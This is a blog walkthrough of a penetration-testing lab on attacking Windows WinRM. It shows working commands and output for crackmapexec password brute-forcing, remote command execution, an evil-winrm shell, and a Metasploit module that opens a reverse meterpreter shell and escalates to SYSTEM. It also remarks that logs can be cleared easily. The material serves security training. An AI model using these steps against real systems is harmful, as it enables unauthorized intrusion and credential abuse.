Exploiting WinRM

Posted by r3kind1e on September 18, 2022

Exploiting WinRM

Windows 远程管理 (WinRM) 是一种 Windows 远程管理协议,可用于通过 HTTP(S) 促进对 Windows 系统的远程访问。

微软在 Windows 中实施了 WinRM,以使系统管理员的生活更轻松。

WinRM 通常以下列方式使用:

  • 远程访问本地网络上的 Windows 主机并与之交互。
  • 在 Windows 系统上远程访问和执行命令。
  • 远程管理和配置 Windows 系统。
  • WinRM 通常使用 TCP 端口 5985 和 5986 (HTTPS)。

WinRM 通过各种形式的身份验证实现系统间通信的访问控制和安全。

我们可以利用一个名为“crackmapexec”的实用程序在 WinRM 上执行暴力破解,以识别用户及其密码,并在目标系统上执行命令。

我们还可以使用名为“evil-winrm”的 ruby 脚本来获取目标系统上的命令 shell 会话。

Demo: Exploiting WinRM

WinRM is a feature that exists within Windows, However, it is not configured to run by default and needs to be explicitly configured and enabled in order for it to work and in order for you to utilize it.

1
Target IP Address: 10.2.18.45
1
nmap -sV 10.2.18.45

Don’t pay attention to actual banner or service version that displays here, because nmap or other Windows systems don’t explicitly have a banner telling you this is WinRM. We do know WinRM is running on this port.

1
nmap -sV -p 5985 10.2.18.45

Brute Forcing & Password Spraying

1
2
3
4
crackmapexec <protocol> <target(s)> -u username1 -p password1 password2
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

WinRM Protocol Password spraying

1
#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Why are we only targeting the administrator account, let’s take a few things into consideration:

Firstly, On Windows, administrator account is definitely there, because it is the first account that’s created when you installed Windows.

Secondly, The administrator account is typically the user account that is going to be used to access by system administrator for obvious reason.

Thirdly, If we gain access to the administrator account that means we have elevated privileges, we not have to go through the process of elevating our privileges manually.

1
2
3
crackmapexec winrm 10.2.18.45 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

WINRM   10.2.18.45  5985    NONE    [*] http://10.2.18.45:5985/wsman

It actually connects to WINRM, don’t worry it tells you that using the wsman or the wsman service, because winRM is implementation of wsman or Windows Management or Windows Management API.

We can utilize crackmapexec to execute arbitary Windows command on the target.

Command execution

Execute Command using WinRM

1
2
3
4
5
#~ cme winrm 192.168.255.131 -u user -p 'password' -X whoami
WINRM       192.168.255.131 5985   ROGER            [*] http://192.168.255.131:5985/wsman
WINRM       192.168.255.131 5985   ROGER            [+] GOLD\user:password (Pwn3d!)
WINRM       192.168.255.131 5985   ROGER            [+] Executed command
WINRM       192.168.255.131 5985   ROGER            gold\user
1
crackmapexec winrm 10.2.18.45 -u administrator -p tinkerbell -x "whoami"

Enumerate all the information to this particular system:

1
crackmapexec winrm 10.2.18.45 -u administrator -p tinkberbell -x "systeminfo"

We have not utilized any exploit code or the exploited vulnerability within WinRM, we simply perform the brute-force attack and we now utilizing the WinRM protocol to legitimately execute commands on the target system. And of course executing commands on the target system will have its own number of logs which you can clear very easily, but this is relatively safe because if WinRM is enabled on the target if firewall rules or exceptions will be added so you can communicate with the system via winRM without any restriction.

Obtain a command shell session:

evil-winrm

We get a command shell facilitated through powershell.

1
2
3
4
5
evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.2.18.45

PS C:\User\Administrator\Documents> whoami
PS C:\User\Administrator\Documents> ipconfig
PS C:\User\Administrator\Documents> net user

WinRM Script Exec Remote Code Execution

WinRM Script Exec 远程代码执行

此模块使用有效凭据登录 WinRM 服务并执行有效负载。它有两种可用的有效负载交付方法:Powershell 2.0 和 VBS CmdStager。该模块将检查 Powershell 2.0 是否可用,如果可用,则使用该方法。否则,它会退回到不那么隐蔽的 VBS CmdStager。重要提示:如果使用 Powershell 方法针对 x64 系统,您必须选择 x64 有效负载。x86 有效负载永远不会返回。

It is a 64 bit meterpreter session because it migrated to 64 bit process. And then we get the privileges associated with this process.

1
2
3
4
5
6
7
8
9
10
11
12
13
service postgresql start && msfconsole

search winrm_script
use exploit/windows/winrm/winrm_script_exec
show option
set RHOSTS 10.2.18.45
set FORCE_VBS true
set USERNAME administrator
set PASSWORD tinkerbell
exploit

meterpreter > sysinfo
meterpreter > getuid

WinRM: Exploitation with Metasploit(WinRM:利用 Metasploit)

概述

为您提供了一台 Kali GUI 机器和一台运行 WinRM 服务器的目标机器。目标机器的 IP 地址在 Kali 机器桌面 (/root/Desktop/target) 上名为 target 的文本文件中提供。

你的任务是使用 Kali 机器上可用的工具对 WinRM 服务进行指纹识别,然后使用 Metasploit 框架漏洞利用和辅助模块来利用漏洞。

目标:利用 WinRM 服务获取目标上的meterpreter并检索标志!

指示:

你的 Kali 机器有一个 IP 地址为 10.10.XY 的接口运行“ip addr”以了解 X 和 Y 的值。

目标机器的 IP 地址在文件“/root/Desktop/target”中提到

不要攻击位于 IP 地址 192.VW1 和 10.10.X.1 的网关

使用的词典:

/usr/share/metasploit-framework/data/wordlists/common_users.txt

/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

我自己的思路

1
Target IP Address : 10.3.27.236
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@attackdefense:~# nmap -sV 10.3.27.236
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 18:14 IST
Nmap scan report for 10.3.27.236
Host is up (0.0026s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.09 seconds

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@attackdefense:~# nmap -p- 10.3.27.236
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 18:16 IST
Nmap scan report for 10.3.27.236
Host is up (0.0026s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49671/tcp open  unknown
49673/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 334.69 seconds
1
2
3
4
5
6
7
8
9
10
11
root@attackdefense:~# nmap -sV -p 5985 10.3.27.236
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 18:25 IST
Nmap scan report for 10.3.27.236
Host is up (0.0030s latency).

PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.61 seconds

Using Credentials

1
crackmapexec winrm 10.3.27.236 -u /usr/share/metasploit-framework/data/wordlists/common_users.txt -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
1
2
3
WINRM       10.3.27.236     5985   NONE             [-] None\administrator:elizabeth "Failed to authenticate the user administrator with ntlm"
WINRM       10.3.27.236     5985   NONE             [-] None\administrator:hottie "Failed to authenticate the user administrator with ntlm"
WINRM       10.3.27.236     5985   NONE             [+] None\administrator:tinkerbell (Pwn3d!)

WinRM protocol Command execution

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@attackdefense:~# crackmapexec winrm 10.3.27.236 -u administrator -p tinkerbell -X whoami
WINRM       10.3.27.236     5985   NONE             [*] http://10.3.27.236:5985/wsman
WINRM       10.3.27.236     5985   NONE             [+] None\administrator:tinkerbell (Pwn3d!)
WINRM       10.3.27.236     5985   NONE             [+] Executed command
WINRM       10.3.27.236     5985   NONE             server\administrator
root@attackdefense:~# crackmapexec winrm 10.3.27.236 -u administrator -p tinkerbell -x ipconfig
WINRM       10.3.27.236     5985   NONE             [*] http://10.3.27.236:5985/wsman
WINRM       10.3.27.236     5985   NONE             [+] None\administrator:tinkerbell (Pwn3d!)
WINRM       10.3.27.236     5985   NONE             [+] Executed command
WINRM       10.3.27.236     5985   NONE             
Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : us-west-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::cda1:e4e1:4b3a:b51d%4
   IPv4 Address. . . . . . . . . . . : 10.3.27.236
   Subnet Mask . . . . . . . . . . . : 255.255.240.0
   Default Gateway . . . . . . . . . : 10.3.16.1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
root@attackdefense:~# crackmapexec winrm 10.3.27.236 -u administrator -p tinkerbell -x "systeminfo"
WINRM       10.3.27.236     5985   NONE             [*] http://10.3.27.236:5985/wsman
WINRM       10.3.27.236     5985   NONE             [+] None\administrator:tinkerbell (Pwn3d!)
WINRM       10.3.27.236     5985   NONE             [+] Executed command
WINRM       10.3.27.236     5985   NONE             
Host Name:                 SERVER
OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          EC2
Registered Organization:   Amazon.com
Product ID:                00430-00000-00000-AA975
Original Install Date:     10/1/2020, 2:03:19 PM
System Boot Time:          9/17/2022, 12:42:08 PM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
BIOS Version:              Xen 4.2.amazon, 8/24/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Coordinated Universal Time
Total Physical Memory:     4,096 MB
Available Physical Memory: 3,188 MB
Virtual Memory: Max Size:  5,504 MB
Virtual Memory: Available: 4,731 MB
Virtual Memory: In Use:    773 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\SERVER
Hotfix(s):                 20 Hotfix(s) Installed.
                           [01]: KB4570720
                           [02]: KB4470502
                           [03]: KB4470788
                           [04]: KB4480056
                           [05]: KB4493510
                           [06]: KB4494174
                           [07]: KB4499728
                           [08]: KB4504369
                           [09]: KB4512577
                           [10]: KB4512937
                           [11]: KB4521862
                           [12]: KB4523204
                           [13]: KB4539571
                           [14]: KB4549947
                           [15]: KB4558997
                           [16]: KB4561600
                           [17]: KB4562562
                           [18]: KB4566424
                           [19]: KB4570332
                           [20]: KB4570333
Network Card(s):           1 NIC(s) Installed.
                           [01]: AWS PV Network Device
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.3.16.1
                                 IP address(es)
                                 [01]: 10.3.27.236
                                 [02]: fe80::cda1:e4e1:4b3a:b51d
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

evil-winrm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@attackdefense:/opt/evil-winrm# ls
CHANGELOG.md  CODE_OF_CONDUCT.md  CONTRIBUTING.md  Dockerfile  Gemfile	Gemfile.lock  LICENSE  README.md  evil-winrm.rb  resources
root@attackdefense:/opt/evil-winrm# evil-winrm.rb -i 10.3.27.236 -u administrator -p tinkerbell

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami      
server\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : us-west-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::cda1:e4e1:4b3a:b51d%4
   IPv4 Address. . . . . . . . . . . : 10.3.27.236
   Subnet Mask . . . . . . . . . . . : 255.255.240.0
   Default Gateway . . . . . . . . . : 10.3.16.1
*Evil-WinRM* PS C:\Users\Administrator\Documents> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            auditor                  DefaultAccount
demo                     Guest                    sysadmin
WDAGUtilityAccount
The command completed with one or more errors.

WinRM Script Exec Remote Code Execution

WinRM Script Exec Remote Code Execution

This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. The module will check if Powershell 2.0 is available, and if so uses that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. IMPORTANT: If targeting an x64 system with the Powershell method you MUST select an x64 payload. An x86 payload will never return.

1
Target IP Address : 10.0.28.36
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > search winrm

Matching Modules
================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  auxiliary/scanner/winrm/winrm_auth_methods                   normal  No     WinRM Authentication Method Detection
   1  auxiliary/scanner/winrm/winrm_cmd                            normal  No     WinRM Command Runner
   2  auxiliary/scanner/winrm/winrm_login                          normal  No     WinRM Login Utility
   3  auxiliary/scanner/winrm/winrm_wql                            normal  No     WinRM WQL Query Runner
   4  exploit/windows/winrm/winrm_script_exec     2012-11-01       manual  No     WinRM Script Exec Remote Code Execution


Interact with a module by name or index, for example use 4 or use exploit/windows/winrm/winrm_script_exec

msf5 > use exploit/windows/winrm/winrm_script_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/winrm/winrm_script_exec) > show options

Module options (exploit/windows/winrm/winrm_script_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     WORKSTATION      yes       The domain to use for Windows authentification
   FORCE_VBS  false            yes       Force the module to use the VBS CmdStager
   PASSWORD                    yes       A specific password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      5985             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URI        /wsman           yes       The URI of the WinRM service
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    yes       A specific username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.4       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf5 exploit(windows/winrm/winrm_script_exec) > set FORCE_VBS true
FORCE_VBS => true
msf5 exploit(windows/winrm/winrm_script_exec) > set PASSWORD tinkerbell
PASSWORD => tinkerbell
msf5 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 10.0.28.36
RHOSTS => 10.0.28.36
msf5 exploit(windows/winrm/winrm_script_exec) > set USERNAME administrator
USERNAME => administrator
msf5 exploit(windows/winrm/winrm_script_exec) > exploit

[*] Started reverse TCP handler on 10.10.16.4:4444 
[*] User selected the FORCE_VBS option
[*] Command Stager progress -   2.01% done (2046/101936 bytes)
[*] Command Stager progress -   4.01% done (4092/101936 bytes)
[*] Command Stager progress -   6.02% done (6138/101936 bytes)
[*] Command Stager progress -   8.03% done (8184/101936 bytes)
[*] Command Stager progress -  10.04% done (10230/101936 bytes)
[*] Command Stager progress -  12.04% done (12276/101936 bytes)
[*] Command Stager progress -  14.05% done (14322/101936 bytes)
[*] Command Stager progress -  16.06% done (16368/101936 bytes)
[*] Command Stager progress -  18.06% done (18414/101936 bytes)
[*] Command Stager progress -  20.07% done (20460/101936 bytes)
[*] Command Stager progress -  22.08% done (22506/101936 bytes)
[*] Command Stager progress -  24.09% done (24552/101936 bytes)
[*] Command Stager progress -  26.09% done (26598/101936 bytes)
[*] Command Stager progress -  28.10% done (28644/101936 bytes)
[*] Command Stager progress -  30.11% done (30690/101936 bytes)
[*] Command Stager progress -  32.11% done (32736/101936 bytes)
[*] Command Stager progress -  34.12% done (34782/101936 bytes)
[*] Command Stager progress -  36.13% done (36828/101936 bytes)
[*] Command Stager progress -  38.14% done (38874/101936 bytes)
[*] Command Stager progress -  40.14% done (40920/101936 bytes)
[*] Command Stager progress -  42.15% done (42966/101936 bytes)
[*] Command Stager progress -  44.16% done (45012/101936 bytes)
[*] Command Stager progress -  46.16% done (47058/101936 bytes)
[*] Command Stager progress -  48.17% done (49104/101936 bytes)
[*] Command Stager progress -  50.18% done (51150/101936 bytes)
[*] Command Stager progress -  52.19% done (53196/101936 bytes)
[*] Command Stager progress -  54.19% done (55242/101936 bytes)
[*] Command Stager progress -  56.20% done (57288/101936 bytes)
[*] Command Stager progress -  58.21% done (59334/101936 bytes)
[*] Command Stager progress -  60.21% done (61380/101936 bytes)
[*] Command Stager progress -  62.22% done (63426/101936 bytes)
[*] Command Stager progress -  64.23% done (65472/101936 bytes)
[*] Command Stager progress -  66.24% done (67518/101936 bytes)
[*] Command Stager progress -  68.24% done (69564/101936 bytes)
[*] Command Stager progress -  70.25% done (71610/101936 bytes)
[*] Command Stager progress -  72.26% done (73656/101936 bytes)
[*] Command Stager progress -  74.26% done (75702/101936 bytes)
[*] Command Stager progress -  76.27% done (77748/101936 bytes)
[*] Command Stager progress -  78.28% done (79794/101936 bytes)
[*] Command Stager progress -  80.29% done (81840/101936 bytes)
[*] Command Stager progress -  82.29% done (83886/101936 bytes)
[*] Command Stager progress -  84.30% done (85932/101936 bytes)
[*] Command Stager progress -  86.31% done (87978/101936 bytes)
[*] Command Stager progress -  88.31% done (90024/101936 bytes)
[*] Command Stager progress -  90.32% done (92070/101936 bytes)
[*] Command Stager progress -  92.33% done (94116/101936 bytes)
[*] Command Stager progress -  94.34% done (96162/101936 bytes)
[*] Command Stager progress -  96.34% done (98208/101936 bytes)
[*] Command Stager progress -  98.35% done (100252/101936 bytes)
[*] Sending stage (176195 bytes) to 10.0.28.36
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.0.28.36:49751) at 2022-09-17 19:41:07 +0530
[*] Session ID 1 (10.10.16.4:4444 -> 10.0.28.36:49751) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is katzx.exe (3612) as: SERVER\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (896)
[+] Successfully migrated to svchost.exe (896) as: NT AUTHORITY\SYSTEM
[*] nil
[*] Command Stager progress - 100.00% done (101936/101936 bytes)

meterpreter > sysinfo
Computer        : SERVER
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cat c:\\flag.txt
3c716f95616eec677a7078f92657a230

解决方案

此实验室的解决方案可在以下手册中找到: https://assets.ine.com/labs/ad-manuals/walkthrough-2026.pdf

WinRM Login Utility

WinRM Authentication Method Detection

WinRM Command Runner

WinRM Script Exec Remote Code Execution

远程连接的身份验证

参照解决方案

1
2
3
4
5
6
7
8
9
10
11
12
13
root@attackdefense:~# nmap --top-port 7000 10.0.28.36
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 20:00 IST
Nmap scan report for 10.0.28.36
Host is up (0.0030s latency).
Not shown: 6995 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 36.48 seconds

WinRM Login Utility

WinRM 登录实用程序

此模块尝试对 WinRM 服务进行身份验证。它目前仅在远程端允许协商(NTLM)身份验证时才有效。目前不支持 Kerberos。请注意:要在没有 SSL 的情况下使用此模块,必须设置“AllowUnencrypted”winrm 选项。否则调整端口并根据需要在模块中设置 SSL 选项。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > use auxiliary/scanner/winrm/winrm_login
msf5 auxiliary(scanner/winrm/winrm_login) > show options

Module options (auxiliary/scanner/winrm/winrm_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DOMAIN            WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5985             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   URI               /wsman           yes       The URI of the WinRM service
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

msf5 auxiliary(scanner/winrm/winrm_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf5 auxiliary(scanner/winrm/winrm_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf5 auxiliary(scanner/winrm/winrm_login) > set VERBOSE false
VERBOSE => false
msf5 auxiliary(scanner/winrm/winrm_login) > set RHOSTS 10.0.28.36
RHOSTS => 10.0.28.36
msf5 auxiliary(scanner/winrm/winrm_login) > run

[+] 10.0.28.36:5985 - Login Successful: WORKSTATION\administrator:tinkerbell
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/winrm/winrm_login) > 

WinRM Authentication Method Detection

WinRM 身份验证方法检测

该模块向 HTTP/HTTPS 服务发送请求以查看它是否是 WinRM 服务。如果它是 WinRM 服务,它还会收集支持的身份验证方法。

1
Target IP Address : 10.0.20.140
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 > use auxiliary/scanner/winrm/winrm_auth_methods
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > show options

Module options (auxiliary/scanner/winrm/winrm_auth_methods):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DOMAIN   WORKSTATION      yes       The domain to use for Windows authentification
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    5985             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads (max one per host)
   URI      /wsman           yes       The URI of the WinRM service
   VHOST                     no        HTTP server virtual host

msf5 auxiliary(scanner/winrm/winrm_auth_methods) > set RHOSTS 10.0.20.140
RHOSTS => 10.0.20.140
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > run

[+] 10.0.20.140:5985: Negotiate protocol supported
[+] 10.0.20.140:5985: Basic protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

WinRM Command Runner

WinRM 命令运行程序

该模块使用 WinRM 服务运行任意 Windows 命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > use auxiliary/scanner/winrm/winrm_cmd
msf5 auxiliary(scanner/winrm/winrm_cmd) > show options

Module options (auxiliary/scanner/winrm/winrm_cmd):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       ipconfig /all    yes       The windows command to run
   DOMAIN    WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD                   yes       The password to authenticate with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5985             yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   THREADS   1                yes       The number of concurrent threads (max one per host)
   URI       /wsman           yes       The URI of the WinRM service
   USERNAME                   yes       The username to authenticate as
   VHOST                      no        HTTP server virtual host

msf5 auxiliary(scanner/winrm/winrm_cmd) > set CMD whoami
CMD => whoami
msf5 auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD tinkerbell
PASSWORD => tinkerbell
msf5 auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 10.0.20.140
RHOSTS => 10.0.20.140
msf5 auxiliary(scanner/winrm/winrm_cmd) > set USERNAME administrator
USERNAME => administrator
msf5 auxiliary(scanner/winrm/winrm_cmd) > run

[+] 10.0.20.140:5985     : server\administrator

[+] Results saved to /root/.msf4/loot/20220917210947_default_10.0.20.140_winrm.cmd_result_789998.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/winrm/winrm_cmd) > 

WinRM Script Exec Remote Code Execution

1